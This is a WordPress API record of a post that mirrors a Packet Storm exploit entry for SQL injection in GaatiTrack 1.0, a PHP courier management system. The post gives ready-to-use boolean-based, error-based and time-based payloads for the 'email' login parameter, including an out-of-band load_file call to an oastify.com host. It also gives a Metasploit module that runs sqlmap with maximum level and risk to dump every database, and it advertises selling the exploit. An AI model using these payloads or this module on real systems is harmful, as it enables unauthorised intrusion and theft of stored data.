{"id":20371,"date":"2025-10-06T11:34:51","date_gmt":"2025-10-06T11:34:51","guid":{"rendered":"http:\/\/localhost\/?p=20371"},"modified":"2025-10-06T11:34:51","modified_gmt":"2025-10-06T11:34:51","slug":"gaatitrack-10-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=20371","title":{"rendered":"\ud83d\udcc4 GaatiTrack 1.0 SQL Injection_PACKETSTORM:210194"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-10-06T16:15:56&#8243;,&#8221;description&#8221;:&#8221;GaatiTrack&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 GaatiTrack 1.0 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:210194&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;# Titles: GaatiTrack-1.0 Copyright\u00a92025-Multiple-SQLi &#8211; Metasploit module\\n    # Author: nu11secur1ty\\n    # Date: 10\/06\/2025\\n    # Vendor: https:\/\/www.mayurik.com\/\\n    # Software:\\n    https:\/\/www.sourcecodester.com\/php\/16848\/best-courier-management-system-project-php.html\\n    # Reference: https:\/\/portswigger.net\/web-security\/sql-injection\\n    \\n    ## Description:\\n    The `email` parameter appears to be vulnerable to SQL injection attacks.\\n    The payload &#8216;+(select load_file(&#8216;\\\\\\\\\\\\\\\\\\n    geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\\\\\\\okf&#8217;))+&#8217; was\\n    submitted in the email parameter. This payload injects a SQL sub-query that\\n    calls MySQL&#8217;s load_file function with a UNC file path that references a URL\\n    on an external domain. The application interacted with that domain,\\n    indicating that the injected SQL query was executed.\\n    \\n    STATUS: HIGH-CRITICAL Vulnerability\\n    \\n    \\n    [+]Payload:\\n    &#8211; SQLi:\\n    \\n    &#8220;`SQLi\\n    &#8212;\\n    Parameter: email (POST)\\n        Type: boolean-based blind\\n        Title: AND boolean-based blind &#8211; WHERE or HAVING clause (subquery -\\n    comment)\\n        Payload: email=cnbkCuPP@burpcollaborator.net&#8217;+(select load_file(&#8216;\\\\\\\\\\\\\\\\\\n    geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\\\\\\\okf&#8217;))+&#8221; AND\\n    3077=(SELECT (CASE WHEN (3077=3077) THEN 3077 ELSE (SELECT 5162 UNION\\n    SELECT 5005) END))&#8211; -\\u0026password=r5I!g0t!W9\\n    \\n        Type: error-based\\n        Title: MySQL \\u003e= 5.0 AND error-based &#8211; WHERE, HAVING, ORDER BY or GROUP\\n    BY clause (FLOOR)\\n        Payload: email=cnbkCuPP@burpcollaborator.net&#8217;+(select load_file(&#8216;\\\\\\\\\\\\\\\\\\n    geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\\\\\\\okf&#8217;))+&#8221; AND (SELECT\\n    5507 FROM(SELECT COUNT(*),CONCAT(&#8216;qkqqq&#8217;,(SELECT\\n    (ELT(5507=5507,1))),&#8217;qxxpq&#8217;,FLOOR(RAND(0)*2))x FROM\\n    INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&#8211; YcNj\\u0026password=r5I!g0t!W9\\n    \\n        Type: time-based blind\\n        Title: MySQL \\u003e= 5.0.12 AND time-based blind (query SLEEP)\\n        Payload: email=cnbkCuPP@burpcollaborator.net&#8217;+(select load_file(&#8216;\\\\\\\\\\\\\\\\\\n    geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\\\\\\\okf&#8217;))+&#8221; AND (SELECT\\n    2855 FROM (SELECT(SLEEP(11)))jpbI)&#8211; jtuB\\u0026password=r5I!g0t!W9\\n    &#8212;\\n    &#8220;`\\n    \\n    [+]MSF exploit:\\n    \\n    &#8220;`rb\\n    ##\\n    # gaati.rb\\n    #\\n    # Author: nu11secur1ty\\n    # Description: gaati-sqli\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Auxiliary\\n      include Msf::Exploit::Remote::HttpClient\\n    \\n      def initialize(info = {})\\n        super(\\n          &#8216;Name&#8217;        =\\u003e &#8216;gaati&#8217;,\\n          &#8216;Description&#8217; =\\u003e &#8216;gaati-sqli&#8217;,\\n          &#8216;Author&#8217;      =\\u003e [&#8216;nu11secur1ty&#8217;],\\n          &#8216;License&#8217;     =\\u003e MSF_LICENSE\\n        )\\n    \\n        register_options(\\n          [\\n            OptString.new(&#8216;RAW_REQUEST&#8217;, [ true, &#8216;Raw HTTP request (from\\n    Burp)&#8217;, &#8221; ]),\\n            OptString.new(&#8216;SQLMAP_PATH&#8217;, [ false, &#8216;Full path to sqlmap.py&#8217;,\\n    &#8216;\/home\/kali\/sqlmap-nu11secur1ty\/sqlmap.py&#8217; ])\\n          ]\\n        )\\n      end\\n    \\n      def run\\n        raw_request = datastore[&#8216;RAW_REQUEST&#8217;]\\n        sqlmap_path = datastore[&#8216;SQLMAP_PATH&#8217;] ||\\n    &#8216;\/home\/kali\/sqlmap-nu11secur1ty\/sqlmap.py&#8217;\\n    \\n        if raw_request.nil? || raw_request.empty?\\n          print_error(\\&#8221;RAW_REQUEST is empty \u2014 will attempt to use system\\n    exploit.txt if present.\\&#8221;)\\n        end\\n    \\n        # Prefer system exploit.txt in MSF module dir (no need to cat)\\n        system_exploit =\\n    &#8216;\/usr\/share\/metasploit-framework\/modules\/auxiliary\/MSF\/exploit.txt&#8217;\\n        use_file = nil\\n    \\n        if File.exist?(system_exploit)\\n          use_file = system_exploit\\n          print_good(\\&#8221;Using existing exploit file: #{use_file}\\&#8221;)\\n        else\\n          # fallback: write to user-writable home dir\\n          exploit_dir = File.join(Dir.home, \\&#8221;.msf_exploits\\&#8221;)\\n          Dir.mkdir(exploit_dir) unless Dir.exist?(exploit_dir)\\n          timestamp = Time.now.strftime(\\&#8221;%Y%m%d%H%M%S\\&#8221;)\\n          tmp_file = File.join(exploit_dir, \\&#8221;exploit_#{timestamp}.txt\\&#8221;)\\n    \\n          if raw_request.nil? || raw_request.empty?\\n            print_error(\\&#8221;No RAW_REQUEST provided and no system exploit.txt\\n    found \u2014 nothing to do.\\&#8221;)\\n            return\\n          end\\n    \\n          begin\\n            File.open(tmp_file, \\&#8221;w\\&#8221;) { |f| f.write(raw_request) }\\n            print_good(\\&#8221;Saved RAW_REQUEST -\\u003e #{tmp_file}\\&#8221;)\\n            use_file = tmp_file\\n          rescue Errno::EACCES =\\u003e e\\n            print_error(\\&#8221;Cannot write temp exploit file: #{e}\\&#8221;)\\n            return\\n          rescue =\\u003e e\\n            print_error(\\&#8221;Failed to save temp request: #{e}\\&#8221;)\\n            return\\n          end\\n        end\\n    \\n        unless File.exist?(sqlmap_path)\\n          print_error(\\&#8221;sqlmap.py not found at #{sqlmap_path}. Set SQLMAP_PATH\\n    option to correct path.\\&#8221;)\\n          # do not delete the temp file so user can inspect\\n          return\\n        end\\n    \\n        sqlmap_cmd = [\\n          \\&#8221;python3\\&#8221;,\\n          sqlmap_path,\\n          \\&#8221;-r\\&#8221;, use_file,\\n          \\&#8221;&#8211;no-cast\\&#8221;,\\n          \\&#8221;&#8211;no-escape\\&#8221;,\\n          \\&#8221;&#8211;dbms=mysql\\&#8221;,\\n          \\&#8221;&#8211;time-sec=11\\&#8221;,\\n          \\&#8221;&#8211;random-agent\\&#8221;,\\n          \\&#8221;&#8211;level=5\\&#8221;,\\n          \\&#8221;&#8211;risk=3\\&#8221;,\\n          \\&#8221;&#8211;batch\\&#8221;,\\n          \\&#8221;&#8211;flush-session\\&#8221;,\\n          \\&#8221;&#8211;technique=TBEUSQ\\&#8221;,\\n          \\&#8221;&#8211;union-char=UCHAR\\&#8221;,\\n          &#8216;&#8211;answers=\\&#8221;crack=Y,dict=Y,continue=Y,quit=N\\&#8221;&#8216;,\\n          \\&#8221;&#8211;dump-all\\&#8221;\\n        ].join(\\&#8221; \\&#8221;)\\n    \\n        print_status(\\&#8221;Executing sqlmap: #{sqlmap_cmd}\\&#8221;)\\n        begin\\n          system(sqlmap_cmd)\\n          print_good(\\&#8221;sqlmap finished (check output above)\\&#8221;)\\n        rescue =\\u003e e\\n          print_error(\\&#8221;Failed to execute sqlmap: #{e}\\&#8221;)\\n        ensure\\n          # delete tmp file if we created it\\n          if use_file != system_exploit\\n            begin\\n              File.delete(use_file) if File.exist?(use_file)\\n              print_status(\\&#8221;Deleted temporary file #{use_file}\\&#8221;)\\n            rescue =\\u003e e\\n              print_warning(\\&#8221;Could not delete temporary file: #{e}\\&#8221;)\\n            end\\n          end\\n        end\\n      end\\n    end\\n    \\n    &#8220;`\\n    \\n    # Reproduce:\\n    [href](https:\/\/www.patreon.com\/posts\/gaatitrack-1-0-140566642)\\n    \\n    # Buy an exploit only:\\n    [href](https:\/\/www.patreon.com\/posts\/gaatitrack-1-0-140566642)\\n    \\n    # Time spent:\\n    01:15:00\\n    \\n    \\n    &#8212; \\n    System Administrator &#8211; Infrastructure Engineer\\n    Penetration Testing Engineer\\n    Exploit developer at https:\/\/packetstormsecurity.com\/\\n    https:\/\/cve.mitre.org\/index.html\\n    https:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\n    home page: https:\/\/www.asc3t1c-nu11secur1ty.com\/\\n    hiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\n                              nu11secur1ty \\u003chttp:\/\/nu11secur1ty.com\/\\u003e&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/210194&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/210194\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-10-06T16:15:56&#8243;,&#8221;description&#8221;:&#8221;GaatiTrack&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 GaatiTrack 1.0 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:210194&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;# Titles: GaatiTrack-1.0 Copyright\u00a92025-Multiple-SQLi &#8211; Metasploit module\\n # Author: nu11secur1ty\\n # Date: 10\/06\/2025\\n # Vendor: https:\/\/www.mayurik.com\/\\n # Software:\\n https:\/\/www.sourcecodester.com\/php\/16848\/best-courier-management-system-project-php.html\\n # Reference:&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-20371","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 GaatiTrack 1.0 SQL Injection_PACKETSTORM:210194 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=20371\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 GaatiTrack 1.0 SQL Injection_PACKETSTORM:210194 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-10-06T16:15:56&#8243;,&#8221;description&#8221;:&#8221;GaatiTrack&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 GaatiTrack 1.0 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:210194&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;# Titles: GaatiTrack-1.0 Copyright\u00a92025-Multiple-SQLi &#8211; Metasploit modulen # Author: nu11secur1tyn # Date: 10\/06\/2025n # Vendor: https:\/\/www.mayurik.com\/n # Software:n https:\/\/www.sourcecodester.com\/php\/16848\/best-courier-management-system-project-php.htmln # Reference:...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=20371\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-10-06T11:34:51+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20371#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20371\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 GaatiTrack 1.0 SQL Injection_PACKETSTORM:210194\",\"datePublished\":\"2025-10-06T11:34:51+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20371\"},\"wordCount\":1079,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=20371#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20371\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20371\",\"name\":\"\ud83d\udcc4 GaatiTrack 1.0 SQL Injection_PACKETSTORM:210194 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-10-06T11:34:51+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20371#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=20371\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20371#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 GaatiTrack 1.0 SQL Injection_PACKETSTORM:210194\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 GaatiTrack 1.0 SQL Injection_PACKETSTORM:210194 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=20371","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 GaatiTrack 1.0 SQL Injection_PACKETSTORM:210194 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-10-06T16:15:56&#8243;,&#8221;description&#8221;:&#8221;GaatiTrack&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 GaatiTrack 1.0 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:210194&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;# Titles: GaatiTrack-1.0 Copyright\u00a92025-Multiple-SQLi &#8211; Metasploit modulen # Author: nu11secur1tyn # Date: 10\/06\/2025n # Vendor: https:\/\/www.mayurik.com\/n # Software:n https:\/\/www.sourcecodester.com\/php\/16848\/best-courier-management-system-project-php.htmln # Reference:...","og_url":"https:\/\/zero.redgem.net\/?p=20371","og_site_name":"zero redgem","article_published_time":"2025-10-06T11:34:51+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=20371#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=20371"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 GaatiTrack 1.0 SQL Injection_PACKETSTORM:210194","datePublished":"2025-10-06T11:34:51+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=20371"},"wordCount":1079,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=20371#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=20371","url":"https:\/\/zero.redgem.net\/?p=20371","name":"\ud83d\udcc4 GaatiTrack 1.0 SQL Injection_PACKETSTORM:210194 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-10-06T11:34:51+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=20371#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=20371"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=20371#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 GaatiTrack 1.0 SQL Injection_PACKETSTORM:210194"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/20371","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20371"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/20371\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20371"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20371"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20371"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}